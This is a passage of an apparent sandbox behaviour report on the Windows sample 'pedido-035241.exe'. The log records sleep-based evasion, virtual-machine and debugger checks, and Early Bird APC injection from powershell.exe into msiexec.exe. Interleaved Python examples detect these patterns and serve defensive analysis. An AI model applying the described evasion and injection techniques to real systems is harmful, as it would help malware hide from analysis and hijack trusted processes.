            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596499
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596390
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596281
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596172
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596062
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595953
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595843
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595734
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595625
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595515
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595406
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595296
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595187
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595077
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594968
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594859
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594750
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594640
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7152
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2581
            Source: C:\Users\user\Desktop\pedido-035241.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso7E83.tmp\nsExec.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532 | Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep count: 33 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -30437127721620741s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1608 | Thread sleep count: 1890 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -599890s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1608 | Thread sleep count: 7968 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -599781s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -599671s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -599562s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -599452s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -599343s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -599234s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -599125s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -599015s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -598906s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -598796s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -598687s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -598578s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -598468s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -598359s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -598250s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -598140s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -598031s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -597921s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -597812s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -597702s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -597593s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -597484s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -597375s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -597265s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -597156s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -597046s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -596937s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -596827s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -596718s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -596609s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -596499s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -596390s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -596281s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -596172s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -596062s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -595953s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -595843s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -595734s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -595625s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -595515s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -595406s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -595296s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -595187s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -595077s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -594968s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -594859s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -594750s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3236 | Thread sleep time: -594640s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\pedido-035241.exe | Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\pedido-035241.exe | Code function: 0_2_0040683D FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\pedido-035241.exe | Code function: 0_2_0040290B FindFirstFileW
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599890
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599781
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599671
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599562
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599452
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599343
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599234
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599125
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599015
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598906
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598796
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598687
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598578
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598468
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598359
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598250
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598140
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598031
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597921
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597812
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597702
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597593
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597484
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597375
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597265
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597156
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597046
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596937
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596827
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596718
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596609
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596499
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596390
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596281
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596172
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596062
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595953
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595843
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595734
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595625
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595515
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595406
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595296
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595187
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595077
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594968
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594859
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594750
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594640
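The sleep evidence above, together with the matching "Thread sleep time" rows for msiexec.exe TID 3236 earlier in this section, can be triaged mechanically rather than read row by row. The following Python is an added example and is not part of the Joe Sandbox report: it parses rows in the row format used here, groups the delay values per process and thread, and applies the report's own two thresholds (a single delay of at least 3 minutes, and more than 30 sleeps issued by one thread). The rows it runs on are constructed to mirror the report's values, the values are treated as milliseconds (the report prints an "s" suffix, but only milliseconds make 600000 the 10 minute sleep its long-sleep signature refers to), and the reading of a strictly decreasing series of delays as a loop that re-sleeps for the time remaining until a deadline is an interpretation of mine, not a statement the report makes.

```python
import re
from collections import defaultdict

# Thresholds taken from the report's own signatures: a single delay of
# three minutes or more ("Contains long sleeps (>= 3 min)") and more than
# 30 sleeps issued by one thread ("Thread sleep count: 33 > 30").
LONG_SLEEP_MS = 3 * 60 * 1000
SLEEP_COUNT_LIMIT = 30

# Both row shapes used in this section: "Thread sleep time: -600000s" and
# "Thread delayed: delay time: 600000". Values are read as milliseconds
# (assumption: the report's "s" suffix does not fit its own 3 minute rule).
SLEEP_ROW = re.compile(
    r"Source:\s*(?P<proc>[^\s|]+)"              # image path, no spaces
    r"(?:\s*\|?\s*TID:\s*(?P<tid>\d+))?"        # optional thread id
    r".*?(?:Thread sleep time:\s*-(?P<ms1>\d+)s"
    r"|delay time:\s*(?P<ms2>\d+))"
)


def constructed_sample():
    """Constructed rows in the format of this section (not copied from it)."""
    rows = [
        "Source: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "
        "TID: 7532 | Thread sleep time: -8301034833169293s >= -30000s",
        "Source: C:\\Windows\\SysWOW64\\msiexec.exe | Thread delayed: "
        "delay time: 922337203685477",
        "Source: C:\\Windows\\System32\\conhost.exe | Last function: Thread delayed",
    ]
    # 33 sleeps from one msiexec.exe thread, each about 110 ms shorter
    # than the previous one, shaped like the TID 3236 rows of the report.
    rows += [
        "Source: C:\\Windows\\SysWOW64\\msiexec.exe TID: 3236 | "
        f"Thread sleep time: -{600000 - 110 * i}s >= -30000s"
        for i in range(33)
    ]
    return rows


def parse_sleeps(rows):
    """Group delay values (ms) by (process path, thread id or None)."""
    groups = defaultdict(list)
    for row in rows:
        m = SLEEP_ROW.search(row)
        if m is None:
            continue                      # e.g. "Last function: Thread delayed"
        groups[(m.group("proc"), m.group("tid"))].append(
            int(m.group("ms1") or m.group("ms2")))
    return groups


def is_countdown(delays, min_len=3):
    """True when every delay is shorter than the one before it. Read here
    (interpretation, not a report statement) as a loop that re-sleeps for
    the time left until a fixed deadline, which survives sleep skipping."""
    return len(delays) >= min_len and all(b < a for a, b in zip(delays, delays[1:]))


def assess(rows):
    """Per (process, thread): counts, totals and the report's two flags."""
    findings = {}
    for key, delays in parse_sleeps(rows).items():
        findings[key] = {
            "count": len(delays),
            "max_ms": max(delays),
            "total_ms": sum(delays),
            "long_sleep": max(delays) >= LONG_SLEEP_MS,
            "sleep_loop": len(delays) > SLEEP_COUNT_LIMIT,
            "countdown": is_countdown(delays),
        }
    return findings


if __name__ == "__main__":
    for (proc, tid), f in assess(constructed_sample()).items():
        print(f"{proc} TID={tid}: {f}")
```

Run against a whole report export, the same parser separates the single oversized values (the 922337203685477 and -8301034833169293 rows, which are one call each) from the per-thread series that carries the evasion signal.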
            Source: msiexec.exe, 00000006.00000002.2967421092.00000000088DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
            Source: ModuleAnalysisCache.1.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd1f520a1e05ec<
            Source: msiexec.exe, 00000006.00000002.2981297005.0000000024564000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd1f7597775302<
            Source: ModuleAnalysisCache.1.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2967421092.000000000891D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: ModuleAnalysisCache.1.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\pedido-035241.exe | API call chain: ExitProcess graph end node graph_0-3802
            Source: C:\Users\user\Desktop\pedido-035241.exe | API call chain: ExitProcess graph end node graph_0-3806
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_02BED278 LdrInitializeThunk
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4060000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
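The four rows above record the Early Bird ordering the report flags in its summary: powershell.exe creates msiexec.exe (suspended, per the "Creates a process in suspended mode" signature), writes into it at base 4060000, queues an APC to a thread in it, and only then resumes it, so the APC runs before the child's own entry point. The following Python is an added example and is neither code from the report nor from the malware: it correlates a sequence of API-trace events and fires only when a write and an APC queue land on a process that was created suspended by the same caller and has not yet been resumed. The trace it runs on is constructed; the process ids, the VirtualAllocEx call and the two control cases are invented for illustration, and the native-name aliases are the Nt* calls a tracer may log in place of the Win32 wrappers.

```python
from dataclasses import dataclass

CREATE_SUSPENDED = 0x00000004   # CreateProcess dwCreationFlags bit

# Native names a tracer may log instead of the Win32 wrappers.
ALIASES = {
    "NtWriteVirtualMemory": "WriteProcessMemory",
    "NtQueueApcThread": "QueueUserAPC",
    "NtResumeThread": "ResumeThread",
}

# Steps that must hit the suspended child, in this order, before it runs.
EARLY_BIRD_STEPS = ("WriteProcessMemory", "QueueUserAPC", "ResumeThread")


@dataclass(frozen=True)
class ApiEvent:
    ts: int          # sequence number from the trace
    pid: int         # calling process
    api: str         # API name as logged
    target_pid: int  # process the call acts on
    flags: int = 0   # creation flags, for CreateProcess only


def find_early_bird(events):
    """Return one finding per child that was created suspended, then written
    to, then given an APC, and only then resumed, all by its creator."""
    pending = {}     # target_pid -> [source_pid, next step index, chain]
    findings = []
    for ev in sorted(events, key=lambda e: e.ts):
        api = ALIASES.get(ev.api, ev.api)
        if api == "CreateProcess":
            if ev.flags & CREATE_SUSPENDED:
                pending[ev.target_pid] = [ev.pid, 0, ["CreateProcess"]]
            continue
        st = pending.get(ev.target_pid)
        if st is None or ev.pid != st[0]:
            continue                     # not a suspended child of this caller
        src, step, chain = st
        if api == "ResumeThread" and step < len(EARLY_BIRD_STEPS) - 1:
            del pending[ev.target_pid]   # resumed first: not the Early Bird order
            continue
        if api != EARLY_BIRD_STEPS[step]:
            continue                     # e.g. VirtualAllocEx, repeated writes
        chain.append(api)
        if step + 1 == len(EARLY_BIRD_STEPS):
            findings.append({"source_pid": src, "target_pid": ev.target_pid,
                             "chain": list(chain)})
            del pending[ev.target_pid]
        else:
            st[1] = step + 1
    return findings


def constructed_trace():
    """Constructed trace shaped like the report's chain (powershell.exe ->
    msiexec.exe); the pids, the VirtualAllocEx call and the two control
    cases are invented for illustration."""
    return [
        ApiEvent(1, 7400, "CreateProcess", 7512, flags=CREATE_SUSPENDED),
        ApiEvent(2, 7400, "VirtualAllocEx", 7512),
        ApiEvent(3, 7400, "WriteProcessMemory", 7512),
        ApiEvent(4, 7400, "NtQueueApcThread", 7512),
        ApiEvent(5, 7400, "ResumeThread", 7512),
        # control: an ordinary, non-suspended process start
        ApiEvent(6, 1000, "CreateProcess", 2000),
        # control: suspended start but resumed before any write or APC
        ApiEvent(7, 3000, "CreateProcess", 4000, flags=CREATE_SUSPENDED),
        ApiEvent(8, 3000, "ResumeThread", 4000),
        ApiEvent(9, 3000, "WriteProcessMemory", 4000),
        ApiEvent(10, 3000, "QueueUserAPC", 4000),
    ]


if __name__ == "__main__":
    for f in find_early_bird(constructed_trace()):
        print(f"pid {f['source_pid']} -> pid {f['target_pid']}: "
              f"{' -> '.join(f['chain'])}")
```

The second control case is the one worth keeping in a real rule: a write and an APC after the child has already been resumed is still injection, but it is not Early Bird, and the order is what lets the APC run ahead of any user-mode hooks the child would otherwise load.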
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
